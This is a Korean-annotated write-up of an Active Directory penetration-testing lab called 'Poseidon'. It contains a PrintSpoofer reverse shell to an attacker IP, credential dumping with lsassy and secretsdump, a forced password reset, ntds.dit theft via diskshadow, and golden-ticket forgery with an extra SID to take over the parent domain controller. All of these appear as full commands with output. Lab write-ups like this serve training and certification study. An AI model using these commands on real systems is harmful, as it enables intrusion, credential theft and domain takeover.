Information
About this lab
The Poseidon lab showcases Active Directory attacks leveraging ASREPRoasting and SeImpersonate privilege escalation. Learners will extract an AS_REP hash, crack it for credentials, and gain initial access to the target. Privilege escalation through abuse of SeImpersonate permissions demonstrates how attackers can exploit system-level access. Post-exploitation involves dumping credentials from memory, preparing for lateral movement.
Proof of Concept
Information Gathering
Nmap
# Nmap 7.95 scan initiated Tue Dec 30 00:52:20 2025 as: /usr/lib/nmap/nmap -Pn -n --open --min-rate 3000 -oN scan 192.168.170.161-163
Nmap scan report for 192.168.170.161
Host is up (0.13s latency).
Not shown: 988 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Nmap scan report for 192.168.170.162
Host is up (0.13s latency).
Not shown: 987 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
Nmap scan report for 192.168.170.163
Host is up (0.12s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsmanHost Discovery
┌──(kali🎃kali)-[~/oscp]
└─$ nxc smb 192.168.170.161-163
SMB 192.168.170.163 445 GYOZA [*] Windows 10 / Server 2019 Build 19041 x64 (name:GYOZA) (domain:sub.poseidon.yzx) (signing:False) (SMBv1:False)
SMB 192.168.170.162 445 DC02 [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC02) (domain:sub.poseidon.yzx) (signing:True) (SMBv1:True)
SMB 192.168.170.161 445 DC01 [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC01) (domain:poseidon.yzx) (signing:True) (SMBv1:True)Hosts file setting
┌──(kali🎃kali)-[~/oscp]
└─$ sudo cat /etc/hosts
<SNIP>
192.168.170.161 DC01.poseidon.yzx DC01 poseidon.yzx
192.168.170.162 DC02.sub.poseidon.yzx DC02 sub.poseidon.yzx
192.168.170.163 GYOZA.sub.poseidon.yzx GYOZA sub.poseidon.yzx192.168.170.163 - GYOZA
Eric.Wallows / EricLikesRunning800Initial Access
winrm 접속
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.170.163 -u 'Eric.Wallows' -p 'EricLikesRunning800'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\eric.wallows\Documents>Privilege Escalation
권한 확인
- SeImpersonatePrivilege 보유
*Evil-WinRM* PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone EnabledPrintSpoofer64를 사용하여 관리자 권한의 리버스 쉘 연결 시도
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\PrintSpoofer64.exe -c "nc64.exe 192.168.45.168 4444 -e powershell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK관리자 권한으로 리버스쉘 연결 성공
┌──(kali🎃kali)-[~/oscp]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.168] from (UNKNOWN) [192.168.170.163] 51976
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32> whoami
whoami
nt authority\systemRead local.txt
PS C:\Users\chen\Desktop> type local.txt
type local.txt
e241e121fe987ba52330362c74c7dde0
PS C:\Users\chen\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.163
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254Read proof.txt
PS C:\Users\Administrator\Desktop> type proof.txt
type proof.txt
a80226fb09d4f2859247b69003270ef8
PS C:\Users\Administrator\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.163
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254Post-Exploitation
nxc lsassy 모듈
- lisa / LisaWayToGo456
┌──(kali🎃kali)-[~/oscp]
└─$ nxc smb 192.168.170.163 -u 'eric.wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.170.163 445 GYOZA [*] Windows 10 / Server 2019 Build 19041 x64 (name:GYOZA) (domain:sub.poseidon.yzx) (signing:False) (SMBv1:False)
SMB 192.168.170.163 445 GYOZA [+] sub.poseidon.yzx\eric.wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.170.163 445 GYOZA sub\lisa 905ae9b4d957545fb7b9ea0c4333247b
LSASSY 192.168.170.163 445 GYOZA sub\lisa LisaWayToGo456
LSASSY 192.168.170.163 445 GYOZA SUB.POSEIDON.YZX\lisa LisaWayToGo456impacket-secretsdump
- lisa / Impossible2Crack4.?
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-secretsdump eric.wallows:EricLikesRunning800@192.168.170.163 -dc-ip 192.168.170.161
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x670e70016a4a08027d1a7657df06cfb6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
<SNIP>
[*] DefaultPassword
sub.poseidon.yzx\lisa:Impossible2Crack4.?
<SNIP>SharpHound 정보 수집
- lisa 계정이 jackie 계정에 대해 AllExtendedRights 권한 보유
- 강제 패스워드 변경 가능
PS C:\Users\eric.wallows\Documents> .\sharpHound.exe -c All
.\sharpHound.exe -c All
2025-12-30T06:23:43.8819131+00:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-12-30T06:23:44.0069271+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-12-30T06:23:44.0225436+00:00|INFORMATION|Initializing SharpHound at 6:23 AM on 12/30/2025
2025-12-30T06:23:44.0381648+00:00|INFORMATION|Resolved current domain to sub.poseidon.yzx
2025-12-30T06:23:44.1787945+00:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-12-30T06:23:44.2412888+00:00|INFORMATION|Beginning LDAP search for sub.poseidon.yzx
2025-12-30T06:23:44.2412888+00:00|INFORMATION|Collecting AdminSDHolder data for sub.poseidon.yzx
2025-12-30T06:23:44.2881655+00:00|INFORMATION|AdminSDHolder ACL hash B169ECAC85D330AEDDF874BF7EEBE759C62A255C calculated for sub.poseidon.yzx.
2025-12-30T06:23:44.3819136+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SUB.POSEIDON.YZX
2025-12-30T06:23:44.3819136+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SUB.POSEIDON.YZX
2025-12-30T06:23:44.4131690+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SUB.POSEIDON.YZX192.168.170.162 - DC02
Latereal Movement (GYOZA to DC02)
lisa 계정을 이용해서 jackie 계정 비밀번호를 “1q2w3e4r”로 변경
┌──(kali🎃kali)-[~/oscp]
└─$ net rpc password "jackie" -U "sub.poseidon.yzx/lisa"%"LisaWayToGo456" -S "192.168.170.162"
Enter new password for jackie:winrm 접속 성공
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.170.162 -u 'jackie' -p '1q2w3e4r'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jackie\Documents>Read local.txt
*Evil-WinRM* PS C:\Users\jackie\Desktop> type local.txt
0d8548e82b5a329607ceb10cfded0945
*Evil-WinRM* PS C:\Users\jackie\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.162
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Tunnel adapter isatap.{8FABB686-864E-49E3-B767-1756BE5D5A72}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Privilege Escalation
- SeRestorePrivilege 권한 존재
*Evil-WinRM* PS C:\Users\jackie\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledCreate a file and set instructions to copy C:\ drive into E: drive with an alias.
*Evil-WinRM* PS C:\Users\jackie\Desktop> type ine.txt
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias ineX
createX
expose %ine% E:X
end backupXRun the diskshadow with script file using /s option
*Evil-WinRM* PS C:\Users\jackie\Desktop> diskshadow /s ine.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC02, 12/30/2025 8:46:55 AM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
The existing file will be overwritten.
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias ine
-> create
COM call "lvssObject4->GetRootAndLogicalPrefixPaths" failed.
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup
because it requires a volume that cannot be found on this system.
* Including writer "Task Scheduler Writer":
+ Adding component: \TasksStore
* Including writer "VSS Metadata Store Writer":
+ Adding component: \WriterMetadataStore
* Including writer "Performance Counters Writer":
+ Adding component: \PerformanceCounters
* Including writer "System Writer":
+ Adding component: \System Files
+ Adding component: \Win32 Services Files
* Including writer "ASR Writer":
+ Adding component: \ASR\ASR
+ Adding component: \Volumes\Volume{bc265d6e-c516-4c80-b881-4e8c9eae5940}
+ Adding component: \Volumes\Volume{f8e00104-0004-4492-ba85-66d76199f92e}
+ Adding component: \Disks\harddisk0
copy ntds.dit into the current working directory using robocopy.
*Evil-WinRM* PS C:\Users\jackie\Desktop> robocopy /b e:\windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Tuesday, December 30, 2025 8:47:59 AM
Source : e:\windows\ntds\
Dest : C:\Users\jackie\Desktop\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 e:\windows\ntds\
New File 24.0 m ntds.dit
0.0%
0.2%
0.5%
0.7%
1.0%
1.3%
1.5%
1.8%
<SNIP>
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 24.00 m 24.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 181049093 Bytes/sec.
Speed : 10359.712 MegaBytes/min.
Ended : Tuesday, December 30, 2025 8:47:59 AMSave reg system file to extract the hashes
*Evil-WinRM* PS C:\Users\jackie\Desktop> reg save hklm\system system
The operation completed successfullyDonloaded system, ntds.dit system files
*Evil-WinRM* PS C:\Users\jackie\Desktop> download ntds.dit
Info: Downloading C:\Users\jackie\Desktop\ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Users\jackie\Desktop> download system
Info: Downloading C:\Users\jackie\Desktop\ntds.dit to system
Info: Download successful!impacket-secretsdump
- Administrator NTLM hash
- 3bcdd818f7ec942ac91aa30d8db71927
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-secretsdump -system system -ntds ntds.dit local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x6147911c9221199f60a625e5011aafde
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 510cae62a7d31edc77934766cf32f0ac
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3bcdd818f7ec942ac91aa30d8db71927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:92d9c96980ab389994f4ffda906fe102:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
POSEIDON$:1103:aad3b435b51404eeaad3b435b51404ee:01196f308a81e26264eb41dbb4b3e668:::
sub.poseidon.yzx\chen:1104:aad3b435b51404eeaad3b435b51404ee:c4ddb64252adfc9e0558353099ded495:::administrator NTLM 해시로 winrm 접속 성공
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.170.162 -u 'administrator' -H '3bcdd818f7ec942ac91aa30d8db71927'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
d31712374af31e61049be74b57066767
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.162
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Tunnel adapter isatap.{8FABB686-864E-49E3-B767-1756BE5D5A72}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :192.168.170.161 - DC01
Lateral Movement (DC02 to DC01)
eric.wallows 계정이 DC02에 관리자 권한으로 접근 가능하도록 설정
C:\Windows\system32> nltest /domain_trusts /v
List of domain trusts:
0: POSEIDON poseidon.yzx (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
Dom Guid: b77f9b23-9f53-4afc-a027-b38929b466f0
Dom Sid: S-1-5-21-1190331060-1711709193-932631991
1: sub sub.poseidon.yzx (NT 5) (Forest: 0) (Primary Domain) (Native)
Dom Guid: 5cdf1d22-5e08-4243-b8b1-32651fe49630
Dom Sid: S-1-5-21-4168247447-1722543658-2110108262
The command completed successfully도메인 SID 추출
- DC01: S-1-5-21-1190331060-1711709193-932631991
- DC02: S-1-5-21-4168247447-1722543658-2110108262
C:\Windows\system32> nltest /domain_trusts /v
List of domain trusts:
0: POSEIDON poseidon.yzx (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
Dom Guid: b77f9b23-9f53-4afc-a027-b38929b466f0
Dom Sid: S-1-5-21-1190331060-1711709193-932631991
1: sub sub.poseidon.yzx (NT 5) (Forest: 0) (Primary Domain) (Native)
Dom Guid: 5cdf1d22-5e08-4243-b8b1-32651fe49630
Dom Sid: S-1-5-21-4168247447-1722543658-2110108262
The command completed successfullykrbtgt NTLM 해시 추출
- krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
- krbtgt:aes256-cts-hmac-sha1-96:b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-secretsdump eric.wallows:EricLikesRunning800@192.168.170.162
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x6147911c9221199f60a625e5011aafde
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fea81a19d172de0c445c8072b9a1697:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3bcdd818f7ec942ac91aa30d8db71927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e2786e98a3205f9085ef7071d992422f735ce704f4ba5c29f65f25beed348228
Administrator:aes128-cts-hmac-sha1-96:b6593732b7ab7cecd59afadef15b4315
Administrator:des-cbc-md5:e0e03d58a15d315e
krbtgt:aes256-cts-hmac-sha1-96:b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2
krbtgt:aes128-cts-hmac-sha1-96:b5d83edef61d3c3799047e208e13b2c7
krbtgt:des-cbc-md5:b95ee5a11c10d989ticketer.py -nthash KRBTGTHASH -domain CHILDFQDN -domain-sid CHILDDOMAINSID -extra-sid PARENTDOMAINSID- hacker
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-ticketer -nthash 80f23a248d39b8cb93df3a4a2f4199a1 -domain sub.poseidon.yzx -domain-sid S-1-5-21-4168247447-1722543658-2110108262 -extra-sid S-1-5-21-1190331060-1711709193-932631991 Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sub.poseidon.yzx/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache알아낸 정보를 바탕으로 골든티켓을 생성
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-ticketer -aesKey b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2 -domain sub.poseidon.yzx -domain-sid S-1-5-21-4168247447-1722543658-2110108262 -extra-sid S-1-5-21-1190331060-1711709193-932631991-519 Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sub.poseidon.yzx/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache티켓 로드
┌──(kali🎃kali)-[~/oscp]
└─$ export KRB5CCNAME=Administrator.ccache 티켓을 사용하여 DC01 접속
┌──(kali🎃kali)-[~/oscp]
└─$ psexec.py sub.poseidon.yzx/Administrator@DC01.poseidon.yzx -k -no-pass
/home/kali/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on DC01.poseidon.yzx.....
[*] Found writable share ADMIN$
[*] Uploading file SOimhbgj.exe
[*] Opening SVCManager on DC01.poseidon.yzx.....
[*] Creating service zoel on DC01.poseidon.yzx.....
[*] Starting service zoel.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>Read proof.txt
C:\Users\Administrator\Desktop> type proof.txt
e2de23eaf5a0b47f1d49bc7df2ed0247
C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.161
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Tunnel adapter Reusable ISATAP Interface {3A609699-C2B5-4DB1-A8C3-D06AE78AA003}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :